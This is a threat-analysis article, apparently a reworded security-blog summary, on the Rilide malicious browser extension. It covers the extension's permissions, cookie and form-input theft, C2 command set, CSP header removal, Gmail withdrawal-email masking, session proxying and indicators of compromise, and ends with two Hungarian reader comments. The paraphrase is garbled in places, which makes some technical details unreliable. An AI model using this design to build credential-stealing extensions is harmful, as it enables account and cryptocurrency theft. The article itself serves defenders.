Rilide Malware: How browser Extensions Affect Online Threats

How Rilide virus strikes via browser extensions:

What's Rilide?

Rilide, also known as LumaC2 and CookieGenesis, is powerful malware discovered in 2023. It targets Chromium browsers to collect user data and control behaviour. Rilide's main feature is misusing its browser extension to launch attacks.

Change to Browser Extension Attacks

Rilide is a sign of a major threat shift. Traditional man-in-the-browser attacks used malware detecting HTML patterns in browser memory and inserting

However, modern assaults using malicious browser extensions like Rilide bypass most of these restrictions. Extensions don't depend on any website, thus they can run in the background. They also have higher rights to access browser-wide resources like cookies and local storage and bypass same-origin restrictions. Extensions give more persistence and control than traditional web injection methods because they work even when no pages are open.

Extensions also impact JavaScript execution context. Conventional injections may have left traces because they ran alongside security tools and web application code. Extensions create two JavaScript environments in addition to the main page context:

Despite its separation from the main page environment, the content script context can access the page document.

As a service worker, the main page environment and content script cannot access the background code context.

Communication between contexts occurs through hidden browser interfaces from page developers. Because much of the extension's action and evidence are designed to be separated, detection will be harder without changes to the original document. Due of extensions' greater control, persistence, evasion, and ease of development, browser threats likely evolved to employ extensions. Modern browser APIs make browser extensions easy to develop due to their extensive built-in functionality and permissions.

Technique: Rilide Uses Extension Elements

Rilide uses browser extension components to simplify its attacks:

The Manifest:

This crucial section describes the extension's functionality and access levels. One Rilide variant posed as a Google Drive plugin. By listing the appropriate rights, the manifest file reveals Rilide's capabilities. Rilide requested these important permissions:

“Scripting”: Injects and runs JavaScript code on web pages.

You can see, change, and delete browser cookies.

Monitor and change browser network requests using “WebRequest”.

“ClipboardRead/Write”: Reading and editing clipboard content.

“ActiveTab”: Temporary tab content access. With the “host_permission” parameter, the extension can access and interact with any browser-supported scheme, domain, path, and port.

Because they run on all URLs at document_start, content scripts start early in page loading. The manifest also establishes rules under “declarative_net_request” to remove specific Content Security Policy (CSP) headers to allow Rilide to insert inline data. Under “background” lies the extension's service worker, where the malware tracks browser events and communicates with the C2 server.

Background.js, background script:

When the extension is installed, this script executes its initialisation code. Chrome.system retrieves CPU, storage, and extension data, while chrome.management retrieves cookies.getAll retrieves all cookies at startup. A unique ID is maintained locally. This data is sent to the C2 server, which may allow the extension to proxy.

Initialisation fetches commands, viral settings, and injections. After enabling CSP removal rules, the background script tracks browser events. The background script includes a unique C2 server domain gathering method. Recurring Google Chrome alarm calls retrieve them from a Telegram bot. If a domain is blocked, the virus can easily switch.

The background script transmits data exfiltration to the C2 server after listening for content script signals like “new-grabber-info,” which contain input element values. For chrome.tabs.captureVisibleTab to capture the visible tab and send the screenshot data to the C2, it listens for “set-screenshot-result” signals. Verify and initiate proxy connections and execute C2 instructions with frequent alarms.

Command script cmds.js:

This script receives calls from the C2 server and returns results. Some intriguing commands are:

“Extension”: Allows ID-based extensions.

“Push” opens a new tab and displays the fetched content in a browser notice.

“Screenshot”: Captures the tab's content.

“History” retrieves browsing history.

“Cookies”: Retrieves all browser cookies.

“URL”: Opens a new tab with a URL. Device details, URL, and extension setup are available in additional instructions. These instructions simplify attacker development by exploiting Chrome extension features and dynamic workflow modifications.

Main.js and Gmail.js are content scripts

These scripts talk to websites.

main.js:

This script starts with jQuery and disguised dangerous code. Injections from the service worker downloaded during initialisation are executed if the URL matches. A clever injection technique leverages the onreset document element to execute a custom reset event immediately, making detection difficult. Also, main.js uses jQuery to create a generic data stealer listener that selects all input elements. It listens for change events on particular elements and accumulates input values like usernames and passwords when the value changes and the element leaves focus. Chrome.runtime.sendMessage sends stolen info to the service worker, who sends it to C2 servers.

Gmail.js:

It targets mail.google, the Gmail mail client page. Its major goal is 2FA authentication request manipulation to hide cryptocurrency theft. The script regularly checks popular bitcoin wallet emails. If emails contain “Withdrawal Request,” it replaces it with “Authorise New Device”. To replace email preview content, it targets span elements with “withdrawal”.

The script determines email body and authorisation code from CSS classes and content. This script replaces the email body's HTML with hardcoded text. The threat actor uses this strategy to make victims interpret withdrawal requests as less suspicious new device authorisations to withdraw cryptocurrency without alerting them. Detecting email body items requires formatting and language, making it unpredictable.

Proxy Capability

Its ability to turn the victim's browser into an HTTP proxy, which may be implemented using extensions, is one of its best capabilities. This functionality lets the attacker route all requests using the victim's credentials and data. This is especially problematic for financial fraud since hackers might utilise the victim's authenticated session to access financial systems and start transactions or change settings without IP address verification.

CursedChrome, an educational proof-of-concept, provided most proxy functions. It uses WebSocket to link the attacker's C2 server to the extension's service worker. The C2 collects results from the victim's cookies, which are utilised to navigate or submit queries. Backend code and administrative UI are available in CursedChrome, exhibiting easiness.

Scale and Indicators The Trusteer research lab found 50,000 hacked user sessions since early 2025, demonstrating the problem. Rilide targets North America, South America, Europe, and Japan as part of its global campaign.

It provides compromise signs like filenames and hashes:

Files: ico.png, crrule.js, exts.js, rules.json, manifest.json, utils.js, historytab.js, notif.js, config.js, content-scriptsApp.html, background.js, main.js, gmail.js, csp.js, exchangeSettings.js, screen.js, domain.js, inj.js, set.js, proxing.js, cmds.js, machine.js, and -register-pol

Zip file extFiles.zip.

Domain statbrwsr.digital

In conclusion, Rilide is an advanced malware that uses browser extensions to gain long-term control, access private data, bypass security measures, and steal cryptocurrency and financial data more covertly than previous web injection methods.

nem értek hozzá de ez célzott támadás lehetett akkor. marinéni gmailje és tyúb csatornája nem érdekel senkit teszem fel

@muszeresz ez a sztori így igaz lehet vagy sántít benne valami? elég para 😄